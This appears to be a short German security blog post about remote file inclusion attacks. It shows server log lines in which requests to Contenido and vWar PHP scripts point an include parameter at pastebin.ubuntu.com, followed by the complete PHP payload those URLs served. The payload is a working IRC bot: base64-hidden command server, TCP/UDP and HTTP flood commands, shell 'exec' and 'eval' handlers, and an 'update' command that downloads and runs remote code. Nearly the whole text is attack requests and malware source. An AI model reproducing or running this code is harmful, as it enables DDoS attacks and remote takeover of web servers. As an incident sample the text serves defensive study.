[malware] RFI Attacken mit Hilfe von pastebin.ubuntu.com

cat rfi.txt |grep pastebin /doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33902/plain/??? /doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33897/plain/? /doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/? /doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33924/plain/ /doc//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://pastebin.ubuntu.com/33946/plain/? /doc///vwar/backup/errors.php?error=http://pastebin.ubuntu.com/35446/plain/???

<?php ignore_user_abort(TRUE); set_time_limit(0); error_reporting(E_ALL); class bMain { var $config = array( // "prefix"        => "HOMOVAN|", "maxnumbers"    => 5, "maxident"      => 6, "trigger"       => ".", "modes"         => "-ix", "adminhosts"    => array("i.love.ircsluts.net"), "sockbuffer"    => 512, "rejoindelay"   => 900, "cpingdelay"    => 10, "chessburstudp" => 5000, "chessbursttcp" => 100, "httpburst"     => 20, ); var $servers = array( array( "host" => "Y2FydGVyLndpZ2d5bmV0Lm9yZy51aw==", "port" => "OTAwMA==", "channels" => array("I21vYmZpZ2dh"), "control" => true, ), ); var $bots = array(); var $lastrejointime; function bMain() { $this->lastrejointime = time(); } function start() { foreach ($this->servers as $srv) { $bot = new bBot; $bot->setnick($this->generatenick()); $bot->setcontrol($srv["control"]); foreach ($srv["channels"] as $chan) $bot->channels[] = base64_decode($chan); $bot->setdestination(base64_decode($srv["host"]),base64_decode($srv["port"]),$this->generateident()); $bot->lastreconnect = time(); $bot->connect(); $this->bots[] = $bot; } while (1) $this->heartbeat(); } function heartbeat() { if (time()-$this->lastrejointime >= $this->config["rejoindelay"]) { $this->lastrejointime = time(); $botcnt = count($this->bots); for ($i=0; $i<$botcnt; $i++) $this->bots[$i]->joinchans(); } foreach ($this->bots as $botlol) { if ($botlol->isconnected()) $botlol->parsebuffer(); elseif (time()-10 > $botlol->lastreconnect) { /* $botlol->lastreconnect = time(); $botlol->setnick($this->generatenick()); $botlol->connect();*/ exit(); } } } function generatenick() { /* $randnick = $this->config["prefix"]; for ($i=0;$i<$this->config["maxnumbers"];$i++) $randnick .= mt_rand(0,9); return $randnick;*/ $nprefixes = array("Wolf","Wolfeh","Wolfy","Dog","Doggy","Doggy","Cheetah","Yiff","Yiffy","Lion","Lioness","Tiger","Tigah","Aardvark","Badger","Beaver","Cat","Kitty","Deer","Donkey","Donkeh","Bear","Grizzly","Hamster","Pikachu","Mudkip","Goat","Coyote","Flame","Mustang","Lynx","Stallion","Tapir","Panda","Pony","Bunny","Dawg","Inu","Neko","Usagi","Kitsune","Kitune","Tails","Horny","Kinky","Yiffy","Sexy","Manly","Female","Horneh","Sex","Sxc","Flame","Viper","Fire","Desu","Angry","Happy","Playful","Naughty","Good","Speed","Snow","Beach","Windy","Dream","Dreamer","Afro","Skritchy","Lovely","Sonic"); $newnick = $nprefixes[array_rand($nprefixes)].$nprefixes[array_rand($nprefixes)]; for ($i=0; $i<mt_rand(1,$this->config["maxnumbers"]); $i++) $newnick .= mt_rand(0,9); return strtolower($newnick); } function generateident() { $alph = range("a","z"); $randident = ""; for($i = 0;$i<$this->config["maxident"];$i++) $randident .= $alph[rand(0,25)]; return $randident; } function activeconnections() { $concount = 0; foreach ($this->bots as $bot) { if ($bot->isconnected()) $concount++; } return $concount; } function startchess($t, $h, $p, $ps, $ti) { /* if (strlen($this->chessfile) < 1) $this->chessfile = $this->createchessfile(); $this->spawnfakethreads("php ".$this->chessfile." ".base64_encode($h)." ".base64_encode($p)." ".base64_encode($ps)." ".base64_encode($t), intval($th));*/ $ho = ""; if ($t == "udp") { $burst = $this->config["chessburstudp"]; $ho = "udp://"; //print("using udp $burst\n"); } elseif ($t == "tcp") { $burst = $this->config["chessbursttcp"]; $ho = "tcp://"; //print("using tcp $burst\n"); } //else print("else $t\n"); $ho .= $h; $lastping = 0; $out = ""; for($i=0;$i<$ps;$i++) $out .= chr(mt_rand(1, 256)); $i = 0; $pakcnt = 0; $timei = time(); while (1) { if ($p < 1 || $p > 65000) $po = mt_rand(1,65000); else $po = $p; @$fp = fsockopen($ho, $po, $errno, $errstr, 1); if ($fp) { fwrite($fp, $out); fclose($fp); } $i++; if ($i >= $burst) { $ctime = time(); if ($ctime - $lastping >= $this->config["cpingdelay"]) { foreach ($this->bots as $botlol) { $botlol->raw("PING"); } $lastping = $ctime; } $pakcnt += $i; if ($ctime - $timei >= $ti) return $pakcnt; else $i = 0; } } } function starthttp($url, $secs) { $agents = array( "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.4/Megaupload x.0", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.0.1) Gecko/20030306 Camino/0.7", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0", "Opera/9.50 (Windows NT 5.1; U; en-GB)", "Opera/9.50 (Windows NT 5.1; U; en-US)", ); $parsed = parse_url($url); if (!$parsed) return false; $servip = gethostbyname($parsed['host']); if (!$parsed['query']) $parsed['query'] = ""; $lastping = 0; $i = 0; $reqcnt = 0; $timei = time(); while (1) { if ($sock = fsockopen($servip, 80, $errno, $errstr, 1)) { $packet = "GET ".$parsed['path']."?".$parsed['query']." HTTP/1.1\r\n"         . "User-Agent: ".$agents[array_rand($agents)]."\r\n"         . "Host: ".$parsed['host']."\r\n"         . "Connection: Keep-Alive\r\n\r\n"; fwrite($sock, $packet); fclose($sock); } $i++; if ($i >= $this->config["httpburst"]) { $ctime = time(); if ($ctime-$lastping >= $this->config["cpingdelay"]) { foreach ($this->bots as $botlol) { $botlol->raw("PING"); } $lastping = $ctime; } $reqcnt += $i; if ($ctime - $timei >= $secs) return $reqcnt; else $i = 0; } } } /* function spawnfakethreads($cmd, $qty) { if (stristr(PHP_OS, "WIN")) $fullcmd = "start $cmd"; else $fullcmd = "$cmd > /dev/null 2>&1 &"; for ($i=0; $i<$qty; $i++) { shell_exec($fullcmd); } }*/ function update($url, $killprocess, $runcmd, $sourcebot, $source) { //$starttime = time(); $updcode = file_get_contents($url); if ($updcode) $sourcebot->say("Got ".strlen($updcode)." bytes", $source); else return false; //$destfile = $this->randtempfile(); $destfile = tempnam("/tmp", "pdata"); $fh = fopen($destfile, "w"); fwrite($fh, $updcode); fclose($fh); $this->spawnfakethreads($runcmd." ".$destfile, 1); unlink($destfile); if ($killprocess = 1) die("Updating"); } /* function createchessfile() { $tmpfile = tempnam("datab", "/tmp"); $fh = fopen($tmpfile, "w"); fwrite($fh, base64_decode($this->csrc)); fclose($fh); return $tmpfile; }*/ } class bBot { var $currenthost; var $currentport; var $currentident; var $currentnick = "unset"; var $channels = array(); var $allowcontrol = false; var $socket; var $lastreconnect; function setdestination($host, $port, $ident) { $this->currenthost = $host; $this->currentport = $port; $this->currentident = $ident; } function connect() { $this->socket = fsockopen($this->currenthost, $this->currentport, $errno, $errstr, 5); if (feof($this->socket)) { print("connection error: $errstr [$errno]\n"); return false; } stream_set_blocking($this->socket, 0); $this->raw("USER ".$this->currentident." 127.0.0.1 localhost :".php_uname().""); $this->raw("NICK ".$this->currentnick); return true; } function disconnect() { $this->raw("QUIT :Disconnecting"); fclose($this->socket); } function setnick($nick, $set = false) { if ($set) $this->raw("NICK $nick"); $this->currentnick = $nick; } function setcontrol($control) { $this->allowcontrol = $control; } function joinchans() { foreach ($this->channels as $chan) $this->raw("JOIN $chan"); } function raw($text) { fwrite($this->socket, $text."\r\n"); } function say($text, $target, $notice = false) { if (!$notice) $this->raw("PRIVMSG $target :$text"); else $this->raw("NOTICE $target :$text"); } function isconnected() { if ($this->socket &&amp; !feof($this->socket)) return true; else return false; } function parsebuffer() { global $mainclass; $buf = trim(fgets($this->socket, $mainclass->config["sockbuffer"])); if (!$buf || strlen($buf) < 3) { usleep(100000); return false; } if (substr($buf,0,6) == "PING :") $this->raw("PONG :".substr($buf,6)); $cmd = explode(" ", $buf); if (isset($cmd[1])) { switch ($cmd[1]) { case "001": $this->raw("MODE ".$this->currentnick." :".$mainclass->config["modes"]); $this->joinchans(); break; case "433": $this->raw("NICK {$this->currentnick}"); break; case "PRIVMSG": if (!$this->allowcontrol) break; $host = explode("@", $cmd[0]); $text = substr($cmd[3], 1); for ($i=4; $i<1024; $i++) { if (isset($cmd[$i])) $text .= " ".$cmd[$i]; else break; } if (substr($text, 0, 1) == $mainclass->config["trigger"]) { $textnoprefix = substr($text, 1); $textsplit = explode(" ", $textnoprefix); //if ($host[1] == $mainclass->config["adminhost"]) $this->parsecommand($textsplit, $cmd[2], $cmd[0]); foreach ($mainclass->config["adminhosts"] as $admhost) { if (stristr($host[1], $admhost)) { $this->parsecommand($textsplit, $cmd[2], $cmd[0]); break; } } } break; case "KICK": if ($cmd[3] == $this->currentnick) $this->joinchans(); break; } } } function parsecommand($args, $source, $hostname = "") { global $mainclass; $numargs = count($args)-1; switch ($args[0]) { // ADMIN COMMANDS GO HERE case "test": $this->say("hello", $source); break; case "status": $this->say("Connected to ".$mainclass->activeconnections()." server(s).", $source); break; case "info": if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; } else { $safemode = "off"; } $uname = php_uname(); $this->say("$uname (safe: $safemode)", $source); if ($_SERVER['SERVER_NAME'] &&amp; $_SERVER['REQUEST_URI']) $this->say("http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "", $source); break; case "die": $this->raw("QUIT :Die command received from $source"); die(); break; case "chess": if ($numargs < 5) { $this->say("Usage: ".$mainclass->config["trigger"]."chess [type (tcp/udp)] [host] [port] [bytes] [secs]", $source); break; } if ($args[1] != "tcp" &&amp; $args[1] != "udp") { $this->say("Invalid type specified", $source); break; } $this->say("Chess starting", $source); $psizeint = intval($args[4]); $secsint = intval($args[5]); $pakits = $mainclass->startchess($args[1], $args[2], intval($args[3]), $psizeint, $secsint); $mbsent = round(($psizeint*$pakits)/1048576, 2); $this->say("Chess finished (".$args[1].") - host: ".$args[2].":".$args[3].", psize: ".$args[4].", secs: ".$args[5].", sent: ".$mbsent." megabytes at ".round($mbsent/$secsint, 2)." mb/s", $source); break; /* case "stopchess": if ($mainclass->chessrunning) $this->say("Stopping chess!", $source); else $this->say("You're not playing chess you asshat", $source); $mainclass->stopchess = true; break;*/ case "update": if ($numargs < 3) { $this->say("Usage: ".$mainclass->config["trigger"]."update [url] [run with] [kill this process (0/1)]", $source); break; } $this->say("Starting update download...", $source); if (!$mainclass->update($args[1], $args[2], intval($args[3]), $this, $source)) $this->say("Error downloading file, aborting.", $source); break; case "connections": foreach ($mainclass->bots as $botid => $botlol) if ($botlol->isconnected()) $this->say("(\2".$botid."\2) ".$botlol->currenthost.":".$botlol->currentport." - ".$botlol->currentnick, $source); break; case "connect": if ($numargs < 5) { $this->say("Usage: ".$mainclass->config["trigger"]."connect [host] [port] [nick (0=rand)] [channels (,)] [control (0,1)]", $source); break; } $this->say("Connecting to ".$args[1]."...", $source); $newbot = new bBot; if ($args[3] != "0") $newbot->setnick($args[3]); else $newbot->setnick($mainclass->generatenick()); if ($args[5] == "1") $newbot->setcontrol(true); else $newbot->setcontrol(false); $newchannels = explode(",", $args[4]); foreach ($newchannels as $newchan) $newbot->channels[] = $newchan; $newbot->setdestination($args[1],$args[2],$mainclass->generateident()); $newbot->connect(); if ($newbot->isconnected()) { $mainclass->bots[] = $newbot; $this->say("Connection successful, use "disconnect" to disconnect.", $source); } else $this->say("Connection error!", $source); break; case "disconnect": if ($numargs < 1) { $this->say("Usage: ".$mainclass->config["trigger"]."disconnect [conid]", $source); break; } $conid = intval($args[1]); if (strlen($args[1]) > 2 || !$mainclass->bots[$conid]) { $this->say("Invalid connection ID", $source); break; } if ($mainclass->bots[$conid]->allowcontrol) { $ctrlbots = 0; foreach ($mainclass->bots as $bawt) { if ($bawt->allowcontrol) $ctrlbots++; } if ($ctrlbots <= 1) { $this->say("Cannot disconnect while only one control connection remaining, use "die"", $source); break; } } if (count($mainclass->bots) <= 1) { $this->raw("QUIT :Final connection dropped, quitting"); die(); break; } if ($mainclass->bots[$conid]) { $mainclass->bots[$conid]->disconnect(); unset($mainclass->bots[$conid]); sort($mainclass->bots); $this->say("Connection ".$args[1]." disconnected", $source); } else $this->say("Invalid connection ID", $source); break; case "exec": $txt = ""; for ($i=1; $i<1024; $i++) { if (isset($args[$i])) $txt .= $args[$i]." "; else break; } $ph = popen($txt." 2>&1", "r"); $read = fread($ph, 8192); $out = explode("\n", $read); pclose($ph); foreach ($out as $line) { $this->say(trim($line), $source); //sleep(1); } break; case "eval": ob_start(); eval($args); $outa = explode("\n", ob_get_flush()); foreach ($outa as $line) { $this->say(trim($line), $source); //sleep(1); } ob_end_flush(); break; case "http": if ($numargs < 2) { $this->say("Usage: ".$mainclass->config["trigger"]."http [url] [secs]", $source); break; } $this->say("HTTP request flood starting", $source); $requests = $mainclass->starthttp($args[1], intval($args[2])); if ($requests &&amp; $requests > 0) $this->say("HTTP flood finished - sent ".$requests." requests", $source); else $this->say("HTTP flood error, no requests sent", $source); break; } } } $mainclass = new bMain; $mainclass->start(); ?>